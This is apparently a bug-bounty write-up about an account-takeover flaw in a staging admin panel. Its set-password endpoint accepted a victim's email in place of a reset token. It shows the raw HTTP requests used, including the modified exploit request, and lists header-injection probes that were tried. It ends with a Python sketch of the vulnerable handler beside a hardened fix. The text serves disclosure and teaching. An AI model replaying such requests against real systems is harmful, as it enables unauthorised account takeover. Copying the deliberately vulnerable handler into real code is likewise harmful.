I was hunting on a private program on HackerOne. The scope of this program was a single domain: an internal admin panel hosted on staging for testing.
I checked every functionality at random and came to the password-reset flow. I tried my usual methodology for testing password reset for account takeover (ATO): changing the Host header, adding extra Host, X-Forwarded-Host and X-Forwarded-For headers and checking whether they were reflected in the password-reset link, adding an extra email parameter, making the email an array (the request is in JSON format), and so on, but nothing worked.
Then I turned to the password-reset link itself: I opened it, entered new credentials and captured the request.
PUT /auth/api/v1/set-password HTTP/2
Host: target.com
Cookie: cookietest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://target/auth/password-reset?email=sushant_dhopat%40wearehackerone.com&new_user=false&reset_password_token=c9b34c009ccd5d1e05f0a6c7f55811ab94e6cb45ee287f26018cfb6848c9cf52&source_url=http%3A%2F%2Fbing.com
Content-Type: application/json
Origin: https://target.com
Content-Length: 150
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"password":"Ssd@9619979602","reset_password_token":"c9b34c009ccd5d1e05f0a6c7f55811ab94e6cb45ee287f26018cfb6848c9cf52","source_url":"https://target.com"}
Now I started playing with this request. I noticed that when an admin user invites different users to the team and the invited user opens the account-setup / email-verification link, that URL is the same as the password-reset URL; and when the admin user sets a password for a particular user, that URL is also the same as the password-reset URL.
It occurred to me to swap the parameters: I removed reset_password_token from the password-reset request and added an email parameter with the victim's email address.
The request now looks like this:
PUT /auth/api/v1/set-password HTTP/2
Host: target.com
Cookie: cookietest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://target/auth/password-reset?email=sushant_dhopat%40wearehackerone.com&new_user=false&reset_password_token=c9b34c009ccd5d1e05f0a6c7f55811ab94e6cb45ee287f26018cfb6848c9cf52&source_url=http%3A%2F%2Fbing.com
Content-Type: application/json
Origin: https://target.com
Content-Length: 150
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"password":"Css@9619979602","email":"victim@gmail.com","source_url":"https://target.com"}
I sent the request and, unfortunately, the backend doesn't check or verify the password-reset token at all: I had just set a new password for victim@gmail.com. In the same way I could set a new password for any other user without any interaction, which leads to a full account takeover with just an email address.
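To make the root cause concrete, here is an added example (not the program's code, which I never saw) of a set-password handler that behaves as described above, beside a hardened version. The in-memory USERS and RESET_TOKENS stores, the hypothetical issue_reset_token helper and the status codes returned are my assumptions; the fix is that the token alone selects the account, is checked for expiry and is consumed on use, while any client-supplied email is ignored.

```python
import hashlib
import secrets
import time

# Constructed in-memory stores standing in for the application's database (assumption).
USERS = {"victim@gmail.com": {"password_hash": None}}
RESET_TOKENS = {}  # token -> {"email": ..., "expires": unix time}


def _hash_password(password):
    """Salted PBKDF2 so the stored value is not the raw password."""
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt.hex() + ":" + digest.hex()


def issue_reset_token(email, ttl_seconds=900):
    """Hypothetical helper: mint a 64-hex-char token bound to one account."""
    token = secrets.token_hex(32)
    RESET_TOKENS[token] = {"email": email, "expires": time.time() + ttl_seconds}
    return token


def set_password_vulnerable(body):
    """Mirrors the bug in the write-up: a client-supplied 'email' field selects the
    account and the reset token is never verified, so anyone can set any password."""
    if "email" in body:
        email = body["email"]
    else:
        email = RESET_TOKENS.get(body.get("reset_password_token"), {}).get("email")
    if email not in USERS:
        return 404
    USERS[email]["password_hash"] = _hash_password(body["password"])
    return 200


def set_password_fixed(body):
    """Hardened: the account is derived only from a valid, unexpired, single-use token.
    An 'email' field in the body is ignored, so it can no longer pick the victim."""
    token = body.get("reset_password_token")
    if not isinstance(token, str) or len(token) != 64:
        return 400
    entry = RESET_TOKENS.pop(token, None)  # pop = one-time use
    if entry is None or entry["expires"] < time.time():
        return 403
    email = entry["email"]  # trust the token binding, never the request body
    USERS[email]["password_hash"] = _hash_password(body["password"])
    return 200
```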
Conclusion:
Just play with the password-reset request: replace parameters, add parameters, and so on, and see how the request behaves.